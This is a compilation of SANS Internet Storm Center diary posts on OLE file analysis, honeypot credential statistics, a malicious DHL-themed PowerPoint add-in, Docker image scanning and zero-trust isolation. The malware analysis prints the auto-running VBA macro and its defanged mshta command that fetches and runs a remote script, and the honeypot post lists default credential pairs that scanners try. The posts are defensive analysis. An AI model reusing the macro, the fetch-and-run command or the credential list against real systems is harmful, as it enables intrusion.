CAD: .DGN and .MVBA Files, (Mon, Apr 26th)

Regularly I receive questions about MicroStation files, since I wrote a diary entry about AutoCAD drawings containing VBA code.

MicroStation is CAD software (from Bentley Systems), and it can run VBA code.

I’ve never been given malicious MicroStation files, but recently I’ve been given a normal drawing (.dgn) and a script file (.mvba).

To be clear: these are not malware samples, the files were given to me so that I could take a look at the internal file format and report it.

It turns out that both files are OLE files (Compound File Binary Format, the same container used by legacy Office documents), and can thus be analyzed with my oledump.py tool.

Here is the .DGN file:

It’s an OLE file with storage (folder) Dgn-Md containing other storages and streams.

And the metadata identifies this as a MicroStation file (I’m using tail to filter out the thumbnail data):

It does not contain VBA code: AFAIK, .DGN files can not contain VBA code. Please post a comment if I’m wrong, or if you can share a sample .DGN file containing VBA code.

The VBA script file, with extension .MVBA, is also an OLE file, and it does contain VBA code streams:

Here too, the M indicator in oledump's listing flags the streams that contain VBA macros (a lowercase m marks a macro stream that holds only Attribute lines and no real code). The code can be extracted with oledump (select the stream with -s and decompress the VBA with -v):
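To show what an oledump listing is built from, here is an added example of my own (not Didier's oledump.py): a minimal OLE directory walker in Python. It reads the compound-file header, the FAT and the directory, prints every storage and stream path, and flags streams under a VBA storage that are not bookkeeping streams. The sample file it builds is constructed to resemble the listings above and is not a real MicroStation or Office file. Unlike oledump, it does not read stream contents, so it cannot tell a real module from an attribute-only one (oledump's M versus m).

```python
"""Minimal OLE2 / Compound File Binary (CFB) directory walker.

Added example for this post (not part of oledump.py): lists storages and
streams the way oledump's first column does, and flags streams under a
"VBA" storage that are not bookkeeping streams. Reads the directory only,
and only the 109 DIFAT entries in the header (files up to about 6.8 MB).
"""
import struct
import sys

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
NOSTREAM = 0xFFFFFFFF
STORAGE, STREAM, ROOT = 1, 2, 5
# Streams oledump also lists inside the VBA storage that hold no source code.
VBA_BOOKKEEPING = {"_VBA_PROJECT", "dir"}


def _sector(data, n, size):
    # Sector n starts at (n + 1) * size: the 512-byte header is "sector -1".
    return data[(n + 1) * size:(n + 2) * size]


def list_entries(data):
    """Return [(path, entry_type, size)] for every entry reachable from the root."""
    if data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 30)[0]
    num_fat, first_dir = struct.unpack_from("<II", data, 44)
    difat = struct.unpack_from("<109I", data, 76)
    fat = []
    for s in difat[:num_fat]:
        fat.extend(struct.unpack(f"<{sector_size // 4}I", _sector(data, s, sector_size)))
    # The directory is itself a FAT chain starting at first_dir.
    directory, s, seen = b"", first_dir, set()
    while s < len(fat) and s < FATSECT and s not in seen:
        seen.add(s)
        directory += _sector(data, s, sector_size)
        s = fat[s]
    entries = []
    for off in range(0, len(directory) - 127, 128):
        name_len, etype = struct.unpack_from("<HB", directory, off + 64)
        name = directory[off:off + max(name_len - 2, 0)].decode("utf-16-le")
        left, right, child = struct.unpack_from("<III", directory, off + 68)
        size = struct.unpack_from("<I", directory, off + 120)[0]
        entries.append((name, etype, left, right, child, size))
    out = []

    def walk(idx, prefix, visited):  # in-order walk of the sibling tree
        if idx >= len(entries) or idx in visited:  # NOSTREAM is > any index
            return
        visited.add(idx)
        name, etype, left, right, child, size = entries[idx]
        walk(left, prefix, visited)
        out.append((prefix + name, etype, size))
        if etype == STORAGE:
            walk(child, prefix + name + "/", visited)
        walk(right, prefix, visited)

    if entries and entries[0][1] == ROOT:
        walk(entries[0][4], "", set())
    return out


def find_macro_candidates(entries):
    """Streams directly under a storage named VBA, minus the bookkeeping ones."""
    hits = []
    for path, etype, _ in entries:
        parts = path.split("/")
        if (etype == STREAM and len(parts) >= 2 and parts[-2] == "VBA"
                and parts[-1] not in VBA_BOOKKEEPING and not parts[-1].startswith("__SRP_")):
            hits.append(path)
    return hits


def _entry(name, etype, left=NOSTREAM, right=NOSTREAM, child=NOSTREAM, size=0):
    raw = name.encode("utf-16-le") + b"\x00\x00"
    e = bytearray(128)
    e[:len(raw)] = raw
    struct.pack_into("<HBB", e, 64, len(raw), etype, 1)   # name length, type, colour
    struct.pack_into("<III", e, 68, left, right, child)
    struct.pack_into("<IQ", e, 116, ENDOFCHAIN, size)    # no data sectors in the sample
    return bytes(e)


def build_sample_ole():
    """Constructed two-sector file (sector 0 = FAT, sector 1 = directory) shaped
    like the .MVBA listing: a VBA storage holding Module1 and _VBA_PROJECT."""
    header = bytearray(512)
    header[:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", header, 24, 0x3E, 3, 0xFFFE, 9, 6)  # v3, 512-byte sectors
    struct.pack_into("<III", header, 40, 0, 1, 1)                 # dir sectors, FAT sectors, first dir
    struct.pack_into("<IIIII", header, 52, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN)
    struct.pack_into("<109I", header, 76, 0, *([FREESECT] * 108))
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    directory = (_entry("Root Entry", ROOT, child=1)
                 + _entry("VBA", STORAGE, child=2)
                 + _entry("Module1", STREAM, right=3, size=1482)
                 + _entry("_VBA_PROJECT", STREAM, size=3231))
    return bytes(header) + fat + directory


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ole()
    listing = list_entries(blob)
    for path, etype, size in listing:
        print(f"{'S' if etype == STORAGE else ' '} {size:8d} {path}")
    print("macro candidates:", find_macro_candidates(listing))
```

Run it with a file argument to list a real .mvba or .dgn; without one it walks the constructed sample. Name-based flagging is only a triage hint: oledump's M/m indicator is based on the compressed VBA source inside the stream, which this walker never decompresses.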

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Sysinternals: Procmon and Sysmon update, (Sun, Apr 25th)

New versions of Procmon and Sysmon were released.

Sysmon adds a new event type, FileDeleteDetected (Event ID 26). Use it to log file deletions without archiving a copy of the deleted file, which the existing FileDelete event (Event ID 23) does.

Didier Stevens
Senior handler

Wireshark 3.4.5 Released, (Sun, Apr 25th)

Wireshark version 3.4.5 was released.

There’s one vulnerability fix and many bug fixes.

For Windows, the bundled Npcap is still at version 1.10.

Didier Stevens
Senior handler

Base64 Hashes Used in Web Scanning, (Sat, Apr 24th)

I have honeypot activity logs going back to May 2018, and I was curious what kind of username:password combinations were stored in the web traffic logs following either a Proxy-Authorization: Basic or an Authorization: Basic header in each log. The graph illustrates an increase in web scanning activity for username:password combinations over the past three years.

Sample Log

20210422-190644: 192.168.25.9:8088-112.112.86.46:53540 data CONNECT www.voanews.com:443 HTTP/1.1
Host: www.voanews.com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

The statistics are interesting: the username:password combinations range from apparently random to easily recognisable. Note that Basic authentication only Base64-encodes the credentials (it does not hash them), so every one of these tokens decodes directly to the cleartext pair.

Top 5 Most Popular Hashes

Og== → :
YWRtaW46YWRtaW4= → admin:admin
YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0= → admin:{12213BD1-69C7-4862-843D-260500D1DA40}
cm9vdDphZG1pbg== → root:admin
X19ld2VvaUBqMzIzMjE6X193ZzI0M3dlZjI0QEAz → __eweoi@j32321:__wg243wef24@@3

Top 10 Hashes

Besides the single colon “:” (empty username and password), which is by far the most common combination in these scans, admin:admin and root:admin, in second and fourth place, are still active and popular today. As for the third entry, I published a diary in October 2019 about this activity, observed until May 2020, targeting the NVMS9000 Digital Video Recorder; it goes into more detail [1].

Other often seen username:password combination that are easily guessable:

[email protected]:Jxl112912
support:admin
root:123456
root:1234567890
root:123321
root:111111
tomcat:tomcat
test:test
ubnt:ubnt
user:123456
user:1234567890
user:123321
user:111111
user:admin
admin:
admin:nbv_12345
admin:support
admin:qwerty
admin:123123
admin:1234
admin:12345
admin:123456
admin:888888
admin:Xw22w
admin:changeme
default
user:password
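The decoding and counting described above, as an added example of my own (not the author's tooling): it pulls every Basic token out of log text, decodes it, counts the username:password pairs and keeps a tally of tokens that are not valid Base64 or carry no colon, so junk does not silently vanish. The log lines are constructed in the shape of the sample above; only the first request is copied from the post.

```python
"""Decode and tally HTTP Basic credentials from honeypot logs.

Added example for this post (not the author's own tooling). SAMPLE_LOG is
constructed, modelled on the sample in the post; only the first request is
copied from it.
"""
import base64
import binascii
import re
from collections import Counter

# Matches both "Proxy-Authorization: Basic ..." and "Authorization: Basic ..."
BASIC_RE = re.compile(r"^(?:Proxy-)?Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$",
                      re.IGNORECASE | re.MULTILINE)

SAMPLE_LOG = """\
20210422-190644: 192.168.25.9:8088-112.112.86.46:53540 data CONNECT www.voanews.com:443 HTTP/1.1
Host: www.voanews.com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

20210422-191002: 192.168.25.9:8088-198.51.100.17:40112 data GET http://example.net/ HTTP/1.1
Proxy-Authorization: Basic Og==
20210422-191340: 192.168.25.9:80-203.0.113.5:51200 data GET /manager/html HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4=
20210422-192015: 192.168.25.9:80-203.0.113.9:51311 data GET / HTTP/1.1
Authorization: Basic X19ld2VvaUBqMzIzMjE6X193ZzI0M3dlZjI0QEAz
20210422-192730: 192.168.25.9:80-203.0.113.9:51390 data GET / HTTP/1.1
Authorization: Basic YWRtaW4=
20210422-193102: 192.168.25.9:80-203.0.113.12:51402 data GET / HTTP/1.1
Authorization: Basic YWRtaW4
"""


def decode_basic(token):
    """Return (username, password) for a Basic token, or None when the token is
    not valid Base64 or the decoded text has no ':' separator."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    if ":" not in text:
        return None
    user, _, password = text.partition(":")
    return user, password


def tally(log_text):
    """Count decoded username:password pairs; return (Counter, n_undecodable)."""
    counts, undecodable = Counter(), 0
    for token in BASIC_RE.findall(log_text):
        creds = decode_basic(token)
        if creds is None:
            undecodable += 1
        else:
            counts[creds] += 1
    return counts, undecodable


def top(counts, n=5):
    """Render the most common pairs as 'user:password' strings, like the post's table."""
    return [(f"{u}:{p}", c) for (u, p), c in counts.most_common(n)]


if __name__ == "__main__":
    counts, bad = tally(SAMPLE_LOG)
    for pair, c in top(counts):
        print(f"{c:5d}  {pair!r}")
    print(f"{bad} Basic token(s) could not be decoded")
```

Counting on the decoded (user, password) tuple rather than on the raw token matters: the same pair can arrive with different padding or whitespace, and keying on the tuple also makes the empty “:” case show up as ('', '') instead of hiding behind Og==.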

Other interesting statistics over the past three years are the HTTP requests seen and the activity by continent.

If you are unsure what services you are sharing with the world, check what Shodan or Censys has been able to discover, which is the view a malicious actor starts from. As a home user, you can look up your own public IP address on Censys to see what your router is exposing to the Internet.

[1] https://isc.sans.edu/forums/diary/Scanning+Activity+for+NVMS9000+Digital+Video+Recorder/25434/
[2] https://isc.sans.edu/forums/diary/Password+Reuse+Strikes+Again/26474
[3] https://isc.sans.edu/forums/diary/Will+You+Put+Your+Password+in+a+Survey/25866
[4] https://isc.sans.edu/forums/diary/Cracking+AD+Domain+Passwords+Password+Assessments+Part+1+Collecting+Hashes/23383
[5] https://isc.sans.edu/forums/diary/Password+History+Insights+Shared+by+a+Reader/22278

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Malicious PowerPoint Add-On: "Small Is Beautiful", (Fri, Apr 23rd)

Yesterday I spotted a DHL-branded phishing campaign that used a PowerPoint file to compromise the victim. The malicious attachment is a PowerPoint add-in. This technique is not new; I already analyzed such a sample in a previous diary[1]. The file name is “dhl-shipment-notification-6207428452.ppt” (SHA256: 934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341) and it has a VT score of 18/60[2].

The main feature of this file could be described as “small is beautiful”. A very small VBA macro is present in the file:

[email protected]:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt 
  1:       444 '\x05DocumentSummaryInformation'
  2:     43736 '\x05SummaryInformation'
  3:       535 'PROJECT'
  4:        44 'PROJECTwm'
  5: M    1482 'VBA/Module111'
  6:      3231 'VBA/_VBA_PROJECT'
  7:      1886 'VBA/__SRP_0'
  8:       142 'VBA/__SRP_1'
  9:       260 'VBA/__SRP_2'
 10:       103 'VBA/__SRP_3'
 11:       382 'VBA/__SRP_4'
 12:        66 'VBA/__SRP_5'
 13:       768 'VBA/dir'
 14: m    1377 'VBA/sex'
 15:        97 'sex/\x01CompObj'
 16:       286 'sex/\x03VBFrame'
 17:        90 'sex/f'
 18:       115 'sex/i01/\x01CompObj'
 19:       220 'sex/i01/f'
 20:       110 'sex/i01/i03/\x01CompObj'
 21:        40 'sex/i01/i03/f'
 22:         0 'sex/i01/i03/o'
 23:       110 'sex/i01/i04/\x01CompObj'
 24:        40 'sex/i01/i04/f'
 25:         0 'sex/i01/i04/o'
 26:       148 'sex/i01/o'
 27:        48 'sex/i01/x'
 28:         0 'sex/o'

The macro is simple but effective:

[email protected]:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 5 -v
Attribute VB_Name = "Module111"
Sub _
Auto_close()
Dim k As New sex
Shell sex.krnahai.bachikyasath.Tag
End Sub

Auto_close() runs when the presentation is closed. It instantiates a UserForm named “sex” (you can see many references to this string in the first oledump output) and passes the Tag property of a nested control on that form, krnahai.bachikyasath, to Shell. Stream 15 confirms that “sex” is a Microsoft Forms 2.0 form:

[email protected]:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 15
00000000: 01 00 FE FF 03 0A 00 00  FF FF FF FF 00 00 00 00  ................
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 19 00 00 00  ................
00000020: 4D 69 63 72 6F 73 6F 66  74 20 46 6F 72 6D 73 20  Microsoft Forms 
00000030: 32 2E 30 20 46 6F 72 6D  00 10 00 00 00 45 6D 62  2.0 Form.....Emb
00000040: 65 64 64 65 64 20 4F 62  6A 65 63 74 00 00 00 00  edded Object....
00000050: 00 F4 39 B2 71 00 00 00  00 00 00 00 00 00 00 00  ..9.q...........
00000060: 00                   

You could load the add-in and inspect the form in PowerPoint (in a sandbox!), but most of the time just extracting strings will do the job. Let’s search for the control name “bachikyasath”:

[email protected]:/MalwareZoo/20210422$ strings dhl-shipment-notification-6207428452.ppt | grep -A 3 -B 3 bachikyasath
sexr
UserFormN
krnahai
bachikyasath<"
Tag&
merilaylo
Attribut
--
Tab4
Tahoma
Page1a
bachikyasath"mshta""hxxps://j[.]mp/hdjkashdjkahs"
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1

So the macro just spawns a shell that runs the Microsoft tool mshta.exe, which fetches and executes whatever script content is returned from hxxps://j[.]mp/hdjkashdjkahs (j.mp is a Bitly short link, so the real hosting location sits behind a redirect).

Unfortunately, this URL points to a blogspot.com page and I was not able to grab the payload. I searched on VT and found that the same file was uploaded one day before and received a score of 0/60! (SHA256: ff1683773ad9b57473e5206023b5ef2eca5b51572bffa7b9e0559408e3e41424)

 

[1] https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162
[2] https://bazaar.abuse.ch/sample/934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


How Safe Are Your Docker Images?, (Thu, Apr 22nd)

Today I don’t know of any organization that is not using Docker in some way. Whether only for test and development or for full production systems, containers are deployed everywhere! Likewise, most popular tools today have a “dockerized” version ready to use, sometimes maintained by the developers themselves, sometimes by third parties. An example is the Docker container that I created with all Didier’s tools[1]. We are also facing a new threat: supply chain attacks (think about SolarWinds or, more recently, Codecov[2]). Combine the attraction of container technologies with this threat and it is clear that Docker images are a great way to compromise an organization!

When we deploy Docker images, we have to take care of two things:

  • Vulnerabilities present in the software installed in the image.
  • Potential malicious changes (a backdoor, extra SSH keys, exfiltration of data, etc.)

Many malicious Docker images have already been spotted in the wild[3], and malicious changes are the harder of the two to detect. But how do we address “common” vulnerabilities? When you implement a vulnerability scanning process in your organization (note that I say “process” and not “tool”!), some components are difficult to scan, like virtual machines in suspended state and… Docker images!

Here is an interesting tool that you can add to your arsenal to quickly scan Docker images for vulnerabilities: grype[4]. Written in Go, the tool is very easy to deploy and use:

[email protected]:/# docker images|grep ssl
drwetter/testssl.sh       latest     699c2c42986f   7 weeks ago     48.5MB
jumanjiman/ssllabs-scan   latest     2a46bf22e388   10 months ago   5.66MB
[email protected]:/# grype docker:drwetter/testssl.sh:latest
 - Vulnerability DB        [no update available]
 - Loaded image
 - Parsed image
 - Cataloged packages      [36 packages]
 - Scanned image           [2 vulnerabilities]
NAME     INSTALLED  FIXED-IN  VULNERABILITY  SEVERITY
openssl  1.1.1j-r0            CVE-2021-3450  High
openssl  1.1.1j-r0            CVE-2021-3449  Medium

grype scans the contents of the Docker image for known vulnerabilities at the operating system level (Alpine, BusyBox, Ubuntu, …) but also in language-specific packages (Ruby, Java, Python, …). Personally, I like the JSON output (--output=json) to process the results with other tools or to index them.
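One way to consume that JSON, as an added example of my own (not a tool from the grype project): a small gate that flattens the report, keeps findings at or above a severity threshold, and exits non-zero so a CI job fails. REPORT is a constructed document that mirrors the two openssl findings shown above and the matches/vulnerability/artifact layout of grype's JSON as I understand it (the real schema carries many more fields); the fix state is marked unknown to match the empty FIXED-IN column above.

```python
"""Gate a build on grype's JSON output.

Added example for this post, not a tool from the grype project. REPORT is a
constructed document mirroring the two openssl findings above and the
matches/vulnerability/artifact layout of grype's --output=json as understood
by the author of this example; the real schema has more fields.
"""
import json
import sys

SEVERITY_RANK = {"negligible": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

REPORT = json.dumps({
    "matches": [
        {"vulnerability": {"id": "CVE-2021-3450", "severity": "High",
                           "fix": {"versions": [], "state": "unknown"}},
         "artifact": {"name": "openssl", "version": "1.1.1j-r0", "type": "apk"}},
        {"vulnerability": {"id": "CVE-2021-3449", "severity": "Medium",
                           "fix": {"versions": [], "state": "unknown"}},
         "artifact": {"name": "openssl", "version": "1.1.1j-r0", "type": "apk"}},
    ]
})


def load_findings(report_json):
    """Flatten grype matches into (artifact, version, vuln id, severity, fixed-in)."""
    doc = json.loads(report_json)
    findings = []
    for m in doc.get("matches", []):
        v, a = m["vulnerability"], m["artifact"]
        fixed = ", ".join(v.get("fix", {}).get("versions", [])) or "-"
        findings.append((a["name"], a["version"], v["id"],
                         v.get("severity", "Unknown"), fixed))
    return findings


def failing(findings, threshold="high"):
    """Findings at or above threshold. An unknown severity is treated as failing:
    an unrated CVE is not evidence that it is harmless."""
    floor = SEVERITY_RANK[threshold.lower()]
    return [f for f in findings if SEVERITY_RANK.get(f[3].lower(), 99) >= floor]


def main(argv):
    # Usage: grype docker:image:tag --output=json > report.json; gate.py report.json high
    report = open(argv[1]).read() if len(argv) > 1 else REPORT
    threshold = argv[2] if len(argv) > 2 else "high"
    bad = failing(load_findings(report), threshold)
    for name, version, vid, sev, fixed in bad:
        print(f"{sev:9} {vid:16} {name} {version} (fixed in: {fixed})")
    return 1 if bad else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Treating an unrated finding as failing is a deliberate choice: the alternative, dropping anything without a severity, is exactly the gap a fresh CVE falls through in the days before it is scored.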

My advice is to scan all your new Docker images, especially the ones that you downloaded from 3rd party websites. 

And you? How do you scan/audit your Docker images? Please share your tools/processes in the comments.

[1] https://isc.sans.edu/forums/diary/DSSuite+A+Docker+Container+with+Didiers+Tools/24926/
[2] https://www.bleepingcomputer.com/news/security/hundreds-of-networks-reportedly-hacked-in-codecov-supply-chain-attack/
[3] https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
[4] https://github.com/anchore/grype

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


A Case for Lockdown and Isolation (and not the Covid kind), (Wed, Apr 21st)

A reader wrote in expressing concerns over a vendor software management platform that had vulnerabilities in third-party modules [1]. Reasonable risk assessment, if you ask me. This comes along with the two “One Liners” we posted yesterday [2] [3]. It sounds like a case for isolation and/or lockdown. Considering 2021’s climate, let’s be clear here: digital, not physical :).

The problem space is the attack surface. The good news: we’ve known about this for years. The bad news: human behavior has not changed (as far as we know) for a very long time [4]. Given one thing we can affect and one that is HARD to change, how do we approach the risk of vulnerabilities in our management plane? Let’s also add to this problem space the fact that we cannot isolate everything (again, digital only).

Now that I’ve said something most of us have heard over and over (and over), what can we do?

The Model: Zero Trust (micro-segmentation, take your pick, but you get the idea)
note: Not all Zero Trust interpretations are equal; I use John Kindervag’s (shameless name drop) [5] [6]

The Use-Case: Critical Asset that is Vulnerable
In this example we will use a device that is still running telnet and can be neither patched nor upgraded. And before you ask: YES, in 2021, this still happens! The device type really does not matter; it could be an old accounting mainframe that is still in production, a critical building management system, or legacy networking hardware that “just cannot be pulled yet.”
Risk analysis can help in replacing this asset, but that is a different road and a layer 8+ problem [7].
 

A Solution:
Put simply? STICK something in front of it. Not all somethings are equal, so let’s get into the details of one way (yes, I’ve done this) to solve it. Using off-the-shelf technology, it is possible to put an encrypted layer with Multi-Factor Authentication (MFA) in front of the device and to allow access only by user/group.


The clientless VPN would be configured to use the organization’s regular IDaM infrastructure, with full group/user restrictions. It would hand the session to an HTML5 proxy that terminates TLS towards the user’s browser and speaks telnet only on the isolated segment towards the device, so the cleartext protocol never leaves that segment. As long as the VPN/firewall solution supports it, SAML becomes possible, along with MFA [8].

This is not easy, but it is not impossible either. And remember: the fact that MFA is being “picked on” lately (with good reason where SMS is concerned [9]) does not stop us from using it. A wise Groot once said “It’s better than 11%”…

Conclusion:
Those highly vulnerable critical assets can be protected, and this risk can be mitigated. The best solution would be to replace these devices; however, we know that is not always feasible. Find your most fragile devices and architect a Zero Trust posture around THOSE assets. The question John Kindervag has told me he gets most often is “Where do I start?”, and your most fragile assets seem as good a place as any.

“Perfection is a road, not a destination” Chiun, Remo Williams

If this topic is interesting, please comment and I can dive deeper (what vendors I used, how I deployed it, results (good, by the way)). Let us know in the comments.

[1] https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11172&cat=SIRT_1&actp=LIST
[2] SonicWall Security Notice: Email Security Zero-Day Vulnerabilities https://bit.ly/3eh1r9n
[3] Pulse Secure Out-of-Cycle Advisory: https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/
[4] https://www.researchgate.net/profile/Nigel-Nicholson-2/publication/13115707_How_hardwired_is_human_behavior/links/5405e3580cf2bba34c1ddd0e/How-hardwired-is-human-behavior.pdf
[5] http://www.virtualstarmedia.com/downloads/Forrester_zero_trust_DNA.pdf
[6] https://media.paloaltonetworks.com/documents/Forrester-No-More-Chewy-Centers.pdf
[7] https://blog.paessler.com/is-it-possible-to-monitor-osi-model-layer-8
[8] https://krebsonsecurity.com/2020/06/turn-on-mfa-before-crooks-do-it-for-you/
[9] https://krebsonsecurity.com/2021/03/can-we-stop-pretending-sms-is-secure-now/

 
